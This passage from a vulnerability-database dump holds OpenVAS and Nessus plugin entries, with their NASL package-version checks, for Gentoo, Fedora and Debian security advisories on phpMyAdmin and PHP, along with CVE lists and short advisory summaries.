\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201201-01\nhttp://bugs.gentoo.org/show_bug.cgi?id=302745\nhttp://bugs.gentoo.org/show_bug.cgi?id=335490\nhttp://bugs.gentoo.org/show_bug.cgi?id=336462\nhttp://bugs.gentoo.org/show_bug.cgi?id=354227\nhttp://bugs.gentoo.org/show_bug.cgi?id=373951\nhttp://bugs.gentoo.org/show_bug.cgi?id=376369\nhttp://bugs.gentoo.org/show_bug.cgi?id=387413\nhttp://bugs.gentoo.org/show_bug.cgi?id=389427\nhttp://bugs.gentoo.org/show_bug.cgi?id=395715\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-1.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-2.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-4.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-7.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-1.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-10.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-12.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-17.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-18.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-2.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-9.php\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201201-01.\";\n\n \n \nif(description)\n{\n script_id(70802);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2010-2958\", \"CVE-2010-3055\", \"CVE-2010-3056\", \"CVE-2010-3263\", \"CVE-2011-0986\", \"CVE-2011-0987\", \"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\", \"CVE-2011-3646\", \"CVE-2011-4064\", \"CVE-2011-4107\", \"CVE-2011-4634\", \"CVE-2011-4780\", \"CVE-2011-4782\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:41 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201201-01 (phpMyAdmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 3.4.9\"), vulnerable: make_list(\"lt 3.4.9\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:00", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-06.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-06 (php)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0421", "CVE-2011-0752", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2011-1148", "CVE-2010-2484", "CVE-2010-2097", "CVE-2011-1466", "CVE-2010-2531", "CVE-2011-3189", "CVE-2010-3065", "CVE-2010-2191", "CVE-2011-1938", "CVE-2010-4697", "CVE-2010-1866", "CVE-2010-1915", "CVE-2011-1092", "CVE-2010-4698", "CVE-2011-2483", "CVE-2006-7243", "CVE-2011-0753", "CVE-2010-4645", "CVE-2010-3436", "CVE-2010-2093", "CVE-2011-1657", "CVE-2011-0708", "CVE-2010-3870", "CVE-2011-3268", "CVE-2010-1861", "CVE-2010-2190", "CVE-2010-3063", "CVE-2011-3182", "CVE-2010-2101", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-3062", "CVE-2010-1914", "CVE-2011-1470", "CVE-2010-1860", "CVE-2010-2094", "CVE-2010-3709", "CVE-2010-3064", "CVE-2011-1469", "CVE-2009-5016", "CVE-2011-3267", "CVE-2010-3710", "CVE-2010-4150", "CVE-2011-1464", "CVE-2011-0755", "CVE-2010-4699", "CVE-2010-1130", "CVE-2010-2100", "CVE-2011-2202", "CVE-2010-2950", "CVE-2010-4700", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-1864", "CVE-2010-4409", "CVE-2010-1862"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:136141256231070769", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070769", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201110_06.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70769\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2006-7243\", \"CVE-2009-5016\", \"CVE-2010-1128\", \"CVE-2010-1129\", \"CVE-2010-1130\", \"CVE-2010-1860\", \"CVE-2010-1861\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1866\", \"CVE-2010-1868\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\", \"CVE-2010-3436\", \"CVE-2010-3709\", \"CVE-2010-3710\", \"CVE-2010-3870\", \"CVE-2010-4150\", \"CVE-2010-4409\", \"CVE-2010-4645\", \"CVE-2010-4697\", \"CVE-2010-4698\", \"CVE-2010-4699\", \"CVE-2010-4700\", \"CVE-2011-0420\", \"CVE-2011-0421\", \"CVE-2011-0708\", \"CVE-2011-0752\", \"CVE-2011-0753\", \"CVE-2011-0755\", \"CVE-2011-1092\", \"CVE-2011-1148\", \"CVE-2011-1153\", \"CVE-2011-1464\", \"CVE-2011-1466\", \"CVE-2011-1467\", \"CVE-2011-1468\", \"CVE-2011-1469\", \"CVE-2011-1470\", \"CVE-2011-1471\", \"CVE-2011-1657\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\", \"CVE-2011-3189\", \"CVE-2011-3267\", \"CVE-2011-3268\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:39 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-06 (php)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were found in PHP, the worst of which\n leading to remote execution of arbitrary code.\");\n script_tag(name:\"solution\", value:\"All PHP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-5.3.8'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-06\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=306939\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=332039\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=340807\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=350908\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=355399\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=358791\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=358975\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=369071\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=372745\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=373965\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=380261\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201110-06.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"dev-lang/php\", unaffected: make_list(\"ge 5.3.8\"), vulnerable: make_list(\"lt 5.3.8\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:51:09", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-06.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-06 (php)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0421", "CVE-2011-0752", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2011-1148", "CVE-2010-2484", "CVE-2010-2097", "CVE-2011-1466", "CVE-2010-2531", "CVE-2011-3189", "CVE-2010-3065", "CVE-2010-2191", "CVE-2011-1938", "CVE-2010-4697", "CVE-2010-1866", "CVE-2010-1915", "CVE-2011-1092", "CVE-2010-4698", "CVE-2011-2483", "CVE-2006-7243", "CVE-2011-0753", "CVE-2010-4645", "CVE-2010-3436", "CVE-2010-2093", "CVE-2011-1657", "CVE-2011-0708", "CVE-2010-3870", "CVE-2011-3268", "CVE-2010-1861", "CVE-2010-2190", "CVE-2010-3063", "CVE-2011-3182", "CVE-2010-2101", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-3062", "CVE-2010-1914", "CVE-2011-1470", "CVE-2010-1860", "CVE-2010-2094", "CVE-2010-3709", "CVE-2010-3064", "CVE-2011-1469", "CVE-2009-5016", "CVE-2011-3267", "CVE-2010-3710", "CVE-2010-4150", "CVE-2011-1464", "CVE-2011-0755", "CVE-2010-4699", "CVE-2010-1130", "CVE-2010-2100", "CVE-2011-2202", "CVE-2010-2950", "CVE-2010-4700", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-1864", "CVE-2010-4409", "CVE-2010-1862"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70769", "href": "http://plugins.openvas.org/nasl.php?oid=70769", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were found in PHP, the worst of which\n leading to remote execution of arbitrary code.\";\ntag_solution = \"All PHP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-5.3.8'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-06\nhttp://bugs.gentoo.org/show_bug.cgi?id=306939\nhttp://bugs.gentoo.org/show_bug.cgi?id=332039\nhttp://bugs.gentoo.org/show_bug.cgi?id=340807\nhttp://bugs.gentoo.org/show_bug.cgi?id=350908\nhttp://bugs.gentoo.org/show_bug.cgi?id=355399\nhttp://bugs.gentoo.org/show_bug.cgi?id=358791\nhttp://bugs.gentoo.org/show_bug.cgi?id=358975\nhttp://bugs.gentoo.org/show_bug.cgi?id=369071\nhttp://bugs.gentoo.org/show_bug.cgi?id=372745\nhttp://bugs.gentoo.org/show_bug.cgi?id=373965\nhttp://bugs.gentoo.org/show_bug.cgi?id=380261\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201110-06.\";\n\n \n \nif(description)\n{\n script_id(70769);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2006-7243\", \"CVE-2009-5016\", \"CVE-2010-1128\", \"CVE-2010-1129\", \"CVE-2010-1130\", \"CVE-2010-1860\", \"CVE-2010-1861\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1866\", \"CVE-2010-1868\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\", \"CVE-2010-3436\", \"CVE-2010-3709\", \"CVE-2010-3710\", \"CVE-2010-3870\", \"CVE-2010-4150\", \"CVE-2010-4409\", \"CVE-2010-4645\", \"CVE-2010-4697\", \"CVE-2010-4698\", \"CVE-2010-4699\", \"CVE-2010-4700\", \"CVE-2011-0420\", \"CVE-2011-0421\", \"CVE-2011-0708\", \"CVE-2011-0752\", \"CVE-2011-0753\", \"CVE-2011-0755\", \"CVE-2011-1092\", \"CVE-2011-1148\", \"CVE-2011-1153\", \"CVE-2011-1464\", \"CVE-2011-1466\", \"CVE-2011-1467\", \"CVE-2011-1468\", \"CVE-2011-1469\", \"CVE-2011-1470\", \"CVE-2011-1471\", \"CVE-2011-1657\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\", \"CVE-2011-3189\", \"CVE-2011-3267\", \"CVE-2011-3268\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:39 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-06 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"dev-lang/php\", unaffected: make_list(\"ge 5.3.8\"), vulnerable: make_list(\"lt 5.3.8\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-12-02T15:42:54", "description": "Changes for 3.4.3.1 (2011-06-07)\n\n - [PMASA-2011-5] Possible session manipulation in Swekey authentication (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -5.php)\n\n - [PMASA-2011-6] Possible code injection in setup script in case session variables are compromised (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-6.php)\n\n - [PMASA-2011-7] Regular expression quoting issue in Synchronize code (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-7.php)\n\n - [PMASA-2011-8] Possible directory traversal (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-8.php)\n\nChanges for 3.4.3.0 (2011-06-27)\n\n - [sync] Missing helper icons in Synchronize\n\n - [setup] Redefine a lable that was wrong\n\n - [parser] master is not a reserved word\n\n - [edit] Inline edit updates multiple duplicate rows\n\n - [edit] Inline edit does not escape backslashes\n\n - [interface] Columns class sometimes changed for nothing\n\n - [interface] Some tooltips do not disappear\n\n - [search] Fix search in non unicode tables\n\n - [display] Inline query edit broken\n\n - [privileges] Generate password option missing on new accounts\n\n - [edit] Inline edit places HTML line breaks in edit area\n\n - [interface] Inline query edit does not escape special characters\n\n - [security] minor XSS (require a valid token)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2011-07-18T00:00:00", "type": "nessus", "title": "Fedora 14 : phpMyAdmin-3.4.3.1-1.fc14 (2011-9144)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpmyadmin", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-9144.NASL", "href": "https://www.tenable.com/plugins/nessus/55604", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-9144.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55604);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\");\n script_bugtraq_id(48563);\n script_xref(name:\"FEDORA\", value:\"2011-9144\");\n\n script_name(english:\"Fedora 14 : phpMyAdmin-3.4.3.1-1.fc14 (2011-9144)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes for 3.4.3.1 (2011-06-07)\n\n - [PMASA-2011-5] Possible session manipulation in Swekey\n authentication\n (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -5.php)\n\n - [PMASA-2011-6] Possible code injection in setup script\n in case session variables are compromised\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-6.php)\n\n - [PMASA-2011-7] Regular expression quoting issue in\n Synchronize code\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-7.php)\n\n - [PMASA-2011-8] Possible directory traversal\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-8.php)\n\nChanges for 3.4.3.0 (2011-06-27)\n\n - [sync] Missing helper icons in Synchronize\n\n - [setup] Redefine a lable that was wrong\n\n - [parser] master is not a reserved word\n\n - [edit] Inline edit updates multiple duplicate rows\n\n - [edit] Inline edit does not escape backslashes\n\n - [interface] Columns class sometimes changed for\n nothing\n\n - [interface] Some tooltips do not disappear\n\n - [search] Fix search in non unicode tables\n\n - [display] Inline query edit broken\n\n - [privileges] Generate password option missing on new\n accounts\n\n - [edit] Inline edit places HTML line breaks in edit\n area\n\n - [interface] Inline query edit does not escape special\n characters\n\n - [security] minor XSS (require a valid token)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-5/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-6/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-7/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-8/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=718964\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-July/062719.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f35faca3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"phpMyAdmin-3.4.3.1-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:30:32", "description": "Several remote vulnerabilities have been discovered in PHP 5, an hypertext preprocessor. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2010-1917 The fnmatch function can be abused to conduct denial of service attacks (by crashing the interpreter) by the means of a stack overflow.\n\n - CVE-2010-2225 The SplObjectStorage unserializer allows attackers to execute arbitrary code via serialized data by the means of a use-after-free vulnerability.\n\n - CVE-2010-3065 The default sessions serializer does not correctly handle a special marker, which allows an attacker to inject arbitrary variables into the session and possibly exploit vulnerabilities in the unserializer.\n\n - CVE-2010-1128 For this vulnerability (predictable entropy for the Linear Congruential Generator used to generate session ids) we do not consider upstream's solution to be sufficient. It is recommended to uncomment the'session.entropy_file' and 'session.entropy_length' settings in the php.ini files. Further improvements can be achieved by setting'session.hash_function' to 1 (one) and incrementing the value of'session.entropy_length'.", "cvss3": {}, "published": "2010-08-23T00:00:00", "type": "nessus", "title": "Debian DSA-2089-1 : php5 - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2225", "CVE-2010-3065"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:php5", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-2089.NASL", "href": "https://www.tenable.com/plugins/nessus/48384", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2089. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48384);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2010-1917\", \"CVE-2010-2225\", \"CVE-2010-3065\");\n script_bugtraq_id(40948, 41991);\n script_xref(name:\"DSA\", value:\"2089\");\n\n script_name(english:\"Debian DSA-2089-1 : php5 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n 